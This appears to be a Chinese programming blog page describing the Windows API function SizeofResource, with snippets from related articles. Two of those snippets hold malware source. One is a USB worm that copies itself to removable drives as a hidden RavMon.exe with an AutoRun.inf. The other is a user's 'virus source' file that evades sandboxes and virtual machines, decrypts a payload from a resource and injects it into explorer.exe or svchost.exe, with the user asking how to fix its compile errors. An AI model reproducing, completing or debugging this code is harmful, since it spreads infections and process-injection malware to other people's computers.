SizeofResource

最新推荐文章于 2023-12-08 19:54:25 发布
原创 最新推荐文章于 2023-12-08 19:54:25 发布 · 1.5k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

 

SizeofResource

  函数功能:该函数返回指定资源字节数大小。
  函数原型:DWORD SizeofResource(HMODULE hModule,HRSRC hReslnfo);
  参数:
  hModule:包合资源的可执行文件模块的句柄。
  hReslnfo:资源句柄。此句柄必须由函数FindResource或FindResourceEx来创建。
  返回值:如果函数运行成功,返回值资源的字节数。如果函数运行失败,返回值为零。若想获得更多的错误信息,请调用GetLastError函数。
my_OS
关注
详细介绍SizeofResource()
felicity_one的博客
04-23 520
书籍:《Visual C++ 2017从入门到精通》的4.2 按钮控件环境:visual studio 2022内容:[例 4.2]制作图片按钮说明:以上内容大部分来自腾讯元宝。
MFC访问资源
aapx76947的博客
08-23 253
在VC中使用自定义资源,FindResource,LoadResource 一、前言 在VC环境中除了我们所常用的Dialog、Menu和Bitmap等标准资源类型之外,它还支持自定义资源类型(Custom Resource),我们自定义的资源类型能做些什么呢?呵呵,用处多多。 1. 默认的皮肤压缩包或语言包。一些支持换肤的软件特别是一些媒体播放器常常有自定义的皮肤文件(你可以尝试...
FindResource()函数
begoodluck的专栏
09-04 5165
 函数功能:该函数确定指定模块中指定类型和名称的资源所在位置。    函数原型:HRSRC FindResource(HMODULE hModule,LPCTSTR lpName,LPCTSTR lpType);    参数:    hModule:处理包含资源的可执行文件的模块。NULL值则指定模块句柄指向操作系统通常情况下创建最近过程的相关位图文件。    lpName:指定资源名称。若想了解
在EXE和DLL中,FindResource的区别
无知人生,记录点滴
06-07 6889
以下的代码在EXE中,执行无误。可是在DLL中FindResource返回的值就为0了,我用::GetLastError(),得出的值是1813,也就是取不到资源,这是为什么? BOOL ExtractFile(char *szZlibFile,DWORD    dwRID) {     HANDLE    hFile = NULL ;     HRSRC    hRsrc = NULL
帮助我逐行解析和学习以下代码: HRSRC hRes = FindResource(NULL, MAKEINTRESOURCE(idr), _T("exe_file")); if(NULL == hRes) return -1 ; DWORD dwSize = SizeofResource(NULL, hRes); if(0 == dwSize) return -1; HGLOBAL hGlobal = LoadResource(NULL, hRes); if(NULL == hGlobal) return -1; LPVOID lp = LockResource(hGlobal); if(NULL == lp) return -1; CFile file; file.Open(resPath, CFile::modeCreate | CFile::modeWrite); file.Write(lp, dwSize); file.Close(); FreeResource (hGlobal);
最新发布
11-06
- `SizeofResource`:获取资源的大小(以字节为单位)。 - 参数:模块句柄(NULL表示当前模块)和资源句柄(hRes)。 - 返回值:资源的大小。 4. `if(0 == dwSize) return -1;` - 如果资源大小为0,则返回-1...
详细注释函数 PLUG_EXPORT void plugsetup(PLUG_SETUPSTRUCT* setupStruct) { hwndDlg = setupStruct->hwndDlg; hMenu = setupStruct->hMenu; hMenuDisasm = setupStruct->hMenuDisasm; hMenuDump = setupStruct->hMenuDump; hMenuStack = setupStruct->hMenuStack; g_HyperHideDrv = new HyperHideDrv(); g_HyperHideDrv->CreateHandleToDriver(); g_Settings = new Settings(); g_Settings->Load(g_HyperHideIniPath); _plugin_menuaddentry(hMenu, MENU_OPTIONS, "&Options"); _plugin_menuaddentry(hMenu, MENU_HYPERVISOR_VISIBLE, "&Hypervisor not visible"); _plugin_menuentrysetchecked(pluginHandle, MENU_HYPERVISOR_VISIBLE, 0); HRSRC Icon = FindResourceW(hinst, MAKEINTRESOURCEW(IDB_ICON), L"PNG"); if (Icon != NULL) { HGLOBAL IconResource = LoadResource(hinst, Icon); if (IconResource != NULL) { IconData.data = LockResource(IconResource); IconData.size = SizeofResource(hinst, Icon); if (IconData.data != NULL && IconData.size != NULL) _plugin_menuseticon(hMenu, &IconData); } } //PLUG_CB_ATTACH info; //info.dwProcessId = 123; //CBATTACH(CB_ATTACH, &info); }
08-07
IconData.size = SizeofResource(hinst, Icon); // 获取图标大小 // 设置菜单图标(需资源数据有效) if (IconData.data != NULL && IconData.size != NULL) _plugin_menuseticon(hMenu, &IconData); } } /...
#include<windows.h> #include<String.h> BOOL UDevice(); void resourceToFile(char *filename,char *Name,char* TypE); int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nShowCmd) { UDevice(); return 0; } BOOL UDevice() { while(1) { char Name[256]="H:\\"; char szName[256]; char ToPath[256]; char infPath[256]; char OpenUDevice[79]; UINT retType; memset(szName,256); memset(ToPath,256); memset(infPath,256); memset(OpenUDevice,79); //do //{ //}while() //遍历盘符 unsigned char i = 0x42; for(; i < 0x5B; i += 0x1) { Name[0] = i; retType = GetDriveType(Name); //判断是否是可移动存储设备 if(retType == DRIVE_REMOVABLE) { //得到自身文件路径 GetModuleFilename(NULL,szName,256); //比较是否和U盘的盘符相同 if(strncmp(Name,1) == 0) { //得到系统目录 GetSystemDirectory(ToPath,256); strcat(ToPath,"\\Uinfect.exe"); //把自身文件复制到系统目录 if(CopyFile(szName,ToPath,TRUE)) { WinExec(ToPath,0);//运行程序 } strcpy(OpenUDevice,"explorer "); strcat(OpenUDevice,Name); //打开U盘 WinExec(OpenUDevice,1); return 0; } else { strcpy(ToPath,Name); strcat(ToPath,"\\RavMon.exe"); strcpy(infPath,Name); strcat(infPath,"\\AutoRun.inf"); //还原U盘上的文件属性 SetFileAttributes(ToPath,FILE_ATTRIBUTE_NORMAL); SetFileAttributes(infPath,FILE_ATTRIBUTE_NORMAL); //删除原有文件 deleteFile(ToPath); deleteFile(infPath); //释放AutoRun.inf到U盘 resourceToFile(infPath,(char*)0x64,(char*)256); //拷贝自身文件到U盘 CopyFile(szName,falSE); //把这两个文件设置成系统,隐藏属性 //这里我查了MSDN 因为第二个参数的宏可能用了或位运算,所以推导宏定义有点麻烦 SetFileAttributes(ToPath,0x6); SetFileAttributes(infPath,0x6); } } } //一分钟检测一次U盘 Sleep(60000); } } void resourceToFile(char *filename,char* TypE) { //寻找自身进程中的资源 HRSRC hRes = Findresource(NULL,Name,TypE); if(hRes==NULL) return; //导入资源 HGLOBAL hgRes = Loadresource(NULL,hRes); if(hgRes==NULL) return; //锁定资源 void *pRes = Lockresource(hgRes); if(pRes==NULL) return; //得到资源字节数 DWORD size = Sizeofresource(NULL,hRes); if(size==0) return; //创建文件 HANDLE hFile = CreateFile(filename,0x40000000,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0); if(hFile==INVALID_HANDLE_value) return; DWORD dwWrite; //把资源写入到文件 if(!WriteFile(hFile,pRes,size,&dwWrite,0)) return; //关闭文件句柄 CloseHandle(hFilE); //释放资源 GlobalFree(hgRes); } 这段代码有什么作用
09-09
给定的代码的功能是遍历系统中的所有逻辑驱动器,将自身程序复制到这些驱动器的根目录下,并创建隐藏的 `autorun.inf` 文件,以实现自动运行指定程序的目的。以下是对代码中各部分Windows API调用及其作用的详细分析...
#define UNICODE #define _UNICODE #include <windows.h> #include <wincrypt.h> #include <wininet.h> #include <tlhelp32.h> #include <random> #include <chrono> #pragma comment(lib, "wininet.lib") #pragma comment(lib, "crypt32.lib") // 反沙箱检测 bool IsSafeEnvironment() { // 检测调试器 if (IsDebuggerPresent()) return false; // 检测虚拟机 unsigned int hypervisorBit; __asm { mov eax, 1 cpuid bt ecx, 31 setc hypervisorBit } if (hypervisorBit) return false; // 检测异常内存 MEMORYSTATUSEX memInfo; memInfo.dwLength = sizeof(memInfo); GlobalMemoryStatusEx(&memInfo); if (memInfo.ullTotalPhys < (4ULL * 1024 * 1024 * 1024)) return false; return true; } // 随机延迟 void RandomDelay() { std::random_device rd; std::mt19937 gen(rd()); std::uniform_int_distribution<> dis(30000, 90000); Sleep(dis(gen)); } // AES-256解密 void AESDecrypt(BYTE* data, DWORD size, BYTE* key) { HCRYPTPROV hProv; HCRYPTKEY hKey; HCRYPTHASH hHash; CryptAcquireContext(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT); CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash); CryptHashData(hHash, key, 32, 0); CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey); CryptDecrypt(hKey, 0, TRUE, 0, data, &size); CryptDestroyKey(hKey); CryptDestroyHash(hHash); CryptReleaseContext(hProv, 0); } // 动态API解析 struct DYNAMIC_APIS { FARPROC VirtualAlloc; FARPROC VirtualProtect; FARPROC CreateThread; FARPROC LoadLibraryW; FARPROC GetProcAddress; DYNAMIC_APIS() { HMODULE hKernel32 = GetModuleHandleW(L"kernel32.dll"); VirtualAlloc = GetProcAddress(hKernel32, "VirtualAlloc"); VirtualProtect = GetProcAddress(hKernel32, "VirtualProtect"); CreateThread = GetProcAddress(hKernel32, "CreateThread"); LoadLibraryW = GetProcAddress(hKernel32, "LoadLibraryW"); GetProcAddress = GetProcAddress(hKernel32, "GetProcAddress"); } }; // 从资源加载加密payload BYTE* LoadEncryptedPayload(DWORD* pSize) { HRSRC hRes = FindResourceW(NULL, MAKEINTRESOURCEW(101), L"BIN"); if (!hRes) return nullptr; *pSize = SizeofResource(NULL, hRes); HGLOBAL hData = LoadResource(NULL, hRes); return (BYTE*)LockResource(hData); } // 查找合适的目标进程 DWORD FindTargetProcess() { PROCESSENTRY32W pe32; pe32.dwSize = sizeof(PROCESSENTRY32W); HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (hSnapshot == INVALID_HANDLE_VALUE) return 0; if (Process32FirstW(hSnapshot, &pe32)) { do { if (_wcsicmp(pe32.szExeFile, L"explorer.exe") == 0 || _wcsicmp(pe32.szExeFile, L"svchost.exe") == 0) { CloseHandle(hSnapshot); return pe32.th32ProcessID; } } while (Process32NextW(hSnapshot, &pe32)); } CloseHandle(hSnapshot); return 0; } // 进程注入 bool ProcessInjection(DWORD pid, BYTE* payload, DWORD size) { DYNAMIC_APIS apis; HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); if (!hProcess) return false; LPVOID pRemoteMem = ((LPVOID(WINAPI*)(LPVOID, SIZE_T, DWORD, DWORD))apis.VirtualAlloc)( NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); if (!pRemoteMem) { CloseHandle(hProcess); return false; } if (!WriteProcessMemory(hProcess, pRemoteMem, payload, size, NULL)) { CloseHandle(hProcess); return false; } DWORD oldProtect; if (!((BOOL(WINAPI*)(LPVOID, SIZE_T, DWORD, PDWORD))apis.VirtualProtect)( pRemoteMem, size, PAGE_EXECUTE_READ, &oldProtect)) { CloseHandle(hProcess); return false; } HANDLE hThread = ((HANDLE(WINAPI*)(LPSECURITY_ATTRIBUTES, SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD))apis.CreateThread)(NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteMem, NULL, 0, NULL); if (!hThread) { CloseHandle(hProcess); return false; } CloseHandle(hThread); CloseHandle(hProcess); return true; } int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { // 反分析检查 if (!IsSafeEnvironment()) { ExitProcess(0); } // 随机延迟 RandomDelay(); // 加载加密payload DWORD payloadSize; BYTE* encryptedPayload = LoadEncryptedPayload(&payloadSize); if (!encryptedPayload) return 1; // 解密payload BYTE aesKey[32] = { /* 你的32字节AES密钥 */ }; AESDecrypt(encryptedPayload, payloadSize, aesKey); // 查找目标进程 DWORD targetPid = FindTargetProcess(); if (!targetPid) return 1; // 进程注入 if (!ProcessInjection(targetPid, encryptedPayload, payloadSize)) { return 1; } return 0; }代码报错:C:/Users/Administrator/Desktop/病毒原码.cpp 0 -1 In function 'bool IsSafeEnvironment()': C:/Users/Administrator/Desktop/病毒原码.cpp 19 8 [错误] expected '(' before '{' token C:/Users/Administrator/Desktop/病毒原码.cpp 20 3 [错误] 'mov' was not declared in this scope C:/Users/Administrator/Desktop/病毒原码.cpp 0 -1 In constructor 'DYNAMIC_APIS::DYNAMIC_APIS()': C:/Users/Administrator/Desktop/病毒原码.cpp 71 32 [错误] too many arguments to function C:/Users/Administrator/Desktop/病毒原码.cpp 71 32 [错误] invalid conversion from 'INT_PTR' {aka 'long long int'} to 'FARPROC' {aka 'long long int (*)()'} [-fpermissive] C:/Users/Administrator/Desktop/病毒原码.cpp 72 34 [错误] too many arguments to function C:/Users/Administrator/Desktop/病毒原码.cpp 72 34 [错误] invalid conversion from 'INT_PTR' {aka 'long long int'} to 'FARPROC' {aka 'long long int (*)()'} [-fpermissive] C:/Users/Administrator/Desktop/病毒原码.cpp 73 32 [错误] too many arguments to function C:/Users/Administrator/Desktop/病毒原码.cpp 73 32 [错误] invalid conversion from 'INT_PTR' {aka 'long long int'} to 'FARPROC' {aka 'long long int (*)()'} [-fpermissive] C:/Users/Administrator/Desktop/病毒原码.cpp 74 32 [错误] too many arguments to function C:/Users/Administrator/Desktop/病毒原码.cpp 74 32 [错误] invalid conversion from 'INT_PTR' {aka 'long long int'} to 'FARPROC' {aka 'long long int (*)()'} [-fpermissive] C:/Users/Administrator/Desktop/病毒原码.cpp 75 34 [错误] too many arguments to function C:/Users/Administrator/Desktop/病毒原码.cpp 75 34 [错误] invalid conversion from 'INT_PTR' {aka 'long long int'} to 'FARPROC' {aka 'long long int (*)()'} [-fpermissive]
08-06
我们正在处理一个C++编译错误问题,用户遇到了两个错误: 1. expected '(' before '{' token 2. invalid conversion from 'INT_PTR' to 'FARPROC' 根据用户提供的引用信息,我们注意到引用[1]提到了一种常见的...
win32-C++-自定义资源文件-读取-保存文件-rc-qt
插件开发
03-29 875
头文件# pragma once //将自定义资源保存到文件 class ZLWin32CustomResource {public :实现文件//定位我们的自定义资源,这里因为我们是从本模块定位资源,所以将句柄简单地置为NULL即可 HRSRC hRsrc = FindResourceW(NULL , resID , resType);//获取资源的大小 DWORD dwSize = SizeofResource(NULL , hRsrc);
C/C++ 实现动态资源文件释放
优快云
12-08 5866
当我们开发Windows应用程序时,通常会涉及到使用资源(Resource)的情况。资源可以包括图标、位图、字符串等,它们以二进制形式嵌入到可执行文件中。在某些情况下,我们可能需要从可执行文件中提取自定义资源并保存为独立的文件。在这篇博客文章中,我们将讨论如何使用C++和WinAPI实现这个目标。首先,让我们考虑一个场景:我们有一个 Windows 应用程序,其中包含了一个自定义的二进制资源比如默认的配置文件,我们希望将这个资源提取出来并保存为一个独立的文件以用于初始化程序配置项。为了实现这个目标,我们可以
资源操作相关函数及例子
lzzw的学习之路
01-02 842
假设我们从资源中读取数据 FindResource函数 确定具有指定类型和名称的资源在指定模块中的位置。如果想指定语言可以用FindResourceEx HMODULE hMdule = NULL; LPSTR ResName = ""; LPSTR ResType = NULL; HRSRC hRes = FindResource(hMdule,ResNa...
VC API常用函数简单例子大全十二(上)
sundy的专栏
07-19 981
第一百一十一个SizeofResource获取一个资源的大小 函数定义:DWORD SizeofResource( HMODULE hModule,//模块句柄,同FindResource,LoadResource的模块句柄一样 HRSRC hResInfo//资源位置句柄,是FindResource函数返回的句柄 ); 例子:自定义资源,EXE文件包含DLL,双击该
VC中"资源定制"学习手记
冷风
05-12 1902
最近写一个可以将console下的控制台程序输出重定向到VC中EDIT控件的小程序 从而达到控制台程序的GUI化,而这之中很重要的的一个环节就是将源程序与我们做的GUI程序编译到一快,这使用到VC中资源定制的功能。 资源即数据,它们被储在程序的EXE文件中,但是它们并非驻留在程序的数据区域中也就是说资源不能通过程序源代码中定义的变量来直接访问,要使用资源就必须使用windows提供的API
学习笔记之资源操作相关函数
yushiqiang1688的专栏
01-22 4368
学习笔记之资源操作相关函数作者:日月明时间:2010-01-22最近遇到了这样个问题:编程实现修改EXE程序的图标,比如把一个EXE程序图标改为pdf、word等图标。。。。。问题终于解决了,其中最主要的就是涉及到资源函数的相应操作。故发此文。。。。。。。。。1、FindResource函数:该函数确定指定模块中指定类型和名称的资源所在位置。HRSRC FindResource( HMODUL
c++ 取资源数据
aa573119818的博客
06-04 680
void* 开始() { HRSRC hr = FindResource(NULL, MAKEINTRESOURCE(IDR_TXT1), L"txt");//取资源句柄 if (NULL == hr) { int ierr = GetLastError(); return(0); } ULONG nResSize = SizeofResource(NULL, hr);//取数据长度 MessageBoxA(0, 到文本(nRe
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值